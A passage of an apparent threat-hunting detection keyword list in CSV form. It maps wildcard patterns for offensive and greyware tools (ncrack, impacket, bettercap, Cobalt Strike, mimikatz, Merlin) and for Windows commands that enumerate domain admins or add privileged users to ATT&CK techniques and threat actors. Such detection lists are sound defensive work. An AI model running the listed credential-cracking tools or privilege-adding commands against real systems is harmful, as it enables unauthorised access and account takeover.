Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" +"*ncrack-*-setup.exe*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" +"*ncrack.exe*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" +"*NcrackInstaller.exe*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" +"*ncrack-master.zip*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" +"*ncrack-services*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" +"*ndDelegation.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ndp_spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*Ne0nd0g/merlin*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*needle_sift.x64*","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","1","N/A","10","10","30","7","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z" +"*Needles without the Thread.pptx*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","10","6","553","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" +"*needlesift.cna*","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","1","N/A","10","10","30","7","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z" +"*neo2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*neo4j console*","greyware_tool_keyword","bloodhound","he neo4j console command is used to start the Neo4j server in console mode. While it is not directly associated with a specific attack technique - it is often used in combination with tools like BloodHound to analyze and visualize data collected from Active Directory environments.","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","0","greyware tool - risks of False positive !","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*neo4j start*","greyware_tool_keyword","Neo4j","Neo4j queries - Computers AllowedToDelegate to other computers","T1210.002 - T1078.003 - T1046","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*neo4jconnection.py*","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","2","136","12","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" +"*neoneggplant*","offensive_tool_keyword","Github Username","author of RAT tools on github","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/neoneggplant","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*nessus* --set listen_address=127.0.0.1*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*Nessus-*.deb*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*Nessus-*.dmg*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*Nessus-*.msi*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*Nessus-*.rpm*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*Nessus-*.tar.gz*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*Nessus-*.txz*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*nessus_vulns_cleaner.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*nessuscli fetch*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*nessuscli fix*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*nessus-updates*.tar.gz*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*net domain_controllers*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*net group ""Domain Admins"" /domain*","greyware_tool_keyword","net","Query users from domain admins in current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*net group *Account Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Backup Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *domain admins* /domain*","offensive_tool_keyword","net","Conti Ransomware Proxyshell PowerShell command #9","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" +"*net group *Domain Computers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Domain Controllers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Domain Controllers*/domain*","greyware_tool_keyword","net","Query Domain Comtrollers Computers in the current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*net group *Enterprise Admins* /dom*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*net group *Enterprise Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Exchange Trusted Subsystem* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Microsoft Exchange Servers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Print Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Schema Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Server Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group / domain *Domain Admins*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*net group /domain *Domain Admins*","greyware_tool_keyword","net","Query users from domain admins in current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*net group administrators /domain*","greyware_tool_keyword","net","showing users in a privileged group. ","T1069 - T1003","TA0007 - TA0040","N/A","N/A","Discovery","N/A","1","0","greyware tool - risks of False positive !","N/A","10","N/A","N/A","N/A","N/A" +"*net localgroup admin*","greyware_tool_keyword","net","discover local admins group","T1069.001 - T1087.002","TA0007 - TA0004","N/A","N/A","Discovery","N/A","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*net localgroup administrators icebreaker*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*net rpc group addmem 'Domain admins' *","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*net rpc group members 'Domain admins' -U *","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*net rpc group members 'Domain Users' -W *","greyware_tool_keyword","samba","The net command is one of the new features of Samba-3 and is an attempt to provide a useful tool for the majority of remote management operations necessary for common tasks. It is used by attackers to find users list","T1087.002 - T1003.002","TA0007 - TA0006","N/A","N/A","Reconnaissance","https://www.samba.org/samba/docs/old/Samba3-HOWTO/NetCommand.html","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*net start SysUpdate*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*net user /add icebreaker *","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*net user HackMe *","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*net user john H4x00r123*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*net view /all /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net* group Administrator* /add /domain*","greyware_tool_keyword","net","adding a user to a privileged group. This action can be used by adversaries to maintain unauthorized access or escalate privileges within the targeted environment.","T1098","TA0003","N/A","N/A","Persistence","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*net.exe* group *Account Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net.exe* group *Backup Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net.exe* group *Domain Computers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net.exe* group *Domain Controllers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net.exe* group *Enterprise Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net.exe* group *Exchange Trusted Subsystem* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net.exe* group *Microsoft Exchange Servers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net.exe* group *Print Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net.exe* group *Schema Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net.exe* group *Server Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net.fuzz *","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*net.fuzz.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*net.probe on","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*net.probe on*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*net.sniff *","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*net.sniff.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*net::alias*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::deleg*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::group*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules 